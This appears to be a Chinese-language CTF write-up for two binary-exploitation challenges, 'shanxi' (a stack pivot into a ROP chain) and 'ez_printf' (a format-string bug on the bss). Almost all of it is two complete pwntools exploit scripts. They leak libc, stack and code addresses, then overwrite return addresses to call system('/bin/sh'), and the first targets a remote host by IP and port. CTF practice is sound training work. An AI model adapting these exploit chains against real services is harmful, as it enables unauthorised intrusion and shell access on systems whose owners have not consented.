shanxi
溢出的字节数不够,利用栈迁移获得足够空间构造rop链
exp如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38
| from pwn import * context(log_level='debug') elf=ELF('./pwn') libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')
p=remote("60.204.130.55",10001) p.recvuntil(b'choice :\n') payload=str(2).encode('utf-8') p.sendline(payload) p.recv() p.sendline(b'%37$p%10$p%19$p') p.recvuntil(b'0x') libc_start_main=int(p.recv(12),16)-128 print(hex(libc_start_main)) p.recvuntil(b'0x') stack_addr=int(p.recv(12),16)-0x30 print(hex(stack_addr)) p.recvuntil(b'0x') main_addr=int(p.recv(12),16) print(hex(main_addr)) code_base = main_addr - 0x12eb offset=libc.symbols['__libc_start_main'] libcbase=libc_start_main-offset print(hex(libcbase)) sys = libcbase + libc.symbols['system'] binsh = libcbase + next(libc.search(b'/bin/sh')) pop_rdi_ret=0x1433 + code_base leave_ret = 0x127f + code_base ret = 0x101a + code_base p.recvuntil(b'choice :\n') p.sendline(str(1).encode('utf-8')) payload=p64(pop_rdi_ret)+p64(binsh)+p64(sys)+b'a'*8 payload += p64(stack_addr-0x28) + p64(leave_ret) p.recvuntil(b'Mountain\n')
p.send(payload) p.interactive()
|
ez_printf
考察了在bss段的格式化字符串,原理不复杂,就是有点麻烦
exp如下:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113
| from pwn import * context(log_level='debug') p=process('./pwn') elf=ELF('./pwn') libc=ELF('/lib/x86_64-linux-gnu/libc.so.6') p.recv() p.send(b'TokameinE_is_the_best_pwner\x00') p.recv()
p.sendline(b'%11$p.%49$p.%8$p.') p.recvuntil(b'0x') base=int(p.recvuntil(b'.',drop=True),16)-134-0x1595 print("base:"+hex(base)) p.recvuntil(b'0x') offset=libc.symbols['__libc_start_main'] print(hex(offset)) true=int(p.recvuntil(b'.',drop=True),16)-128 print(hex(true)) libcbase=true-offset print("libcbase:"+hex(libcbase)) p.recvuntil(b'0x') stack_addr=int(p.recvuntil(b'.',drop=True),16) print("stack_addr:"+hex(stack_addr))
bin_sh=next(libc.search(b'/bin/sh'))+libcbase print("bin_sh:"+hex(bin_sh)) sys_addr=libc.symbols['system']+libcbase print("sys_addr:"+hex(sys_addr)) pop_rdi_ret=base+0x16c3 print("pop_rdi_ret:"+hex(pop_rdi_ret)) ret=base+0x101a print("base:"+hex(ret)) stack_1=stack_addr+0x10 stack_2=stack_addr-0x8 stack_3=stack_addr+0x8 p.recvuntil(b'say?\n') print(hex(stack_1&0xffff)) print(hex(stack_addr&0xffff)) if (stack_1&0xffff)>=(stack_addr&0xffff): payload=b'%'+str(stack_addr&0xffff).encode('utf-8')+b'c%51$hn' payload+=b'%'+str((stack_1&0xffff)-(stack_addr&0xffff)).encode('utf-8')+b'c%33$hn' else: payload=b'%'+str(stack_1&0xffff).encode('utf-8')+b'c%33$hn' payload+=b'%'+str((stack_addr&0xffff)-(stack_1&0xffff)).encode('utf-8')+b'c%51$hn' p.sendline(payload) p.recvuntil(b'say?\n') print(hex(sys_addr&0xffff)) print(hex(bin_sh&0xffff)) if (sys_addr&0xffff)>=(bin_sh&0xffff): payload=b'%'+str(bin_sh&0xffff).encode('utf-8')+b'c%65$hn' payload+=b'%'+str((sys_addr&0xffff)-(bin_sh&0xffff)).encode('utf-8')+b'c%63$hn' else: payload=b'%'+str(sys_addr&0xffff).encode('utf-8')+b'c%63$hn' payload+=b'%'+str((bin_sh&0xffff)-(sys_addr&0xffff)).encode('utf-8')+b'c%65$hn' p.sendline(payload) p.recvuntil(b'say?\n') print(hex((stack_1+2)&0xffff)) print(hex((stack_addr+2)&0xffff)) if ((stack_1+2)&0xffff)>=((stack_addr+2)&0xffff): payload=b'%'+str((stack_addr+2)&0xffff).encode('utf-8')+b'c%51$hn' payload+=b'%'+str(((stack_1+2)&0xffff)-((stack_addr+2)&0xffff)).encode('utf-8')+b'c%33$hn' else: payload=b'%'+str((stack_1+2)&0xffff).encode('utf-8')+b'c%33$hn' payload+=b'%'+str(((stack_addr+2)&0xffff)-((stack_1+2)&0xffff)).encode('utf-8')+b'c%51$hn' p.sendline(payload) p.recvuntil(b'say?\n') print(hex((sys_addr>>16)&0xffff)) print(hex((bin_sh>>16)&0xffff)) if ((sys_addr>>16)&0xffff)>=((bin_sh>>16)&0xffff): payload=b'%'+str((bin_sh>>16)&0xffff).encode('utf-8')+b'c%65$hn' payload+=b'%'+str(((sys_addr>>16)&0xffff)-((bin_sh>>16)&0xffff)).encode('utf-8')+b'c%63$hn' else: payload=b'%'+str((sys_addr>>16)&0xffff).encode('utf-8')+b'c%63$hn' payload+=b'%'+str(((bin_sh>>16)&0xffff)-((sys_addr>>16)&0xffff)).encode('utf-8')+b'c%65$hn' p.sendline(payload) p.recvuntil(b'say?\n') print(hex((stack_1+4)&0xffff)) print(hex((stack_addr+4)&0xffff)) if ((stack_1+4)&0xffff)>=((stack_addr+4)&0xffff): payload=b'%'+str((stack_addr+4)&0xffff).encode('utf-8')+b'c%51$hn' payload+=b'%'+str(((stack_1+4)&0xffff)-((stack_addr+4)&0xffff)).encode('utf-8')+b'c%33$hn' else: payload=b'%'+str((stack_1+4)&0xffff).encode('utf-8')+b'c%33$hn' payload+=b'%'+str(((stack_addr+4)&0xffff)-((stack_1+4)&0xffff)).encode('utf-8')+b'c%51$hn' p.sendline(payload) p.recvuntil(b'say?\n') print(hex((sys_addr>>32)&0xffff)) print(hex((bin_sh>>32)&0xffff)) payload=b'%'+str((bin_sh>>32)&0xffff).encode('utf-8')+b'c%65$hn'+b'%63$hn' p.sendline(payload) p.recvuntil(b'say?\n') payload=b'%'+str(stack_2&0xffff).encode('utf-8')+b'c%33$hn' p.sendline(payload) p.recvuntil(b'say?\n') payload=b'%'+str(pop_rdi_ret&0xffff).encode('utf-8')+b'c%63$hn' p.sendline(payload) p.recvuntil(b'say?\n') payload=b'%'+str(stack_3&0xffff).encode('utf-8')+b'c%33$hn' p.sendline(payload) p.recvuntil(b'say?\n') payload=b'%'+str(ret&0xffff).encode('utf-8')+b'c%63$hn' p.sendline(payload) p.recvuntil(b'say?\n') payload=b'%'+str(stack_3&0xffff).encode('utf-8')+b'c%33$hn' p.sendline(payload) p.recvuntil(b'say?\n') payload=b'%'+str(ret&0xffff).encode('utf-8')+b'c%63$hn' p.sendline(payload) p.recv() p.interactive()
|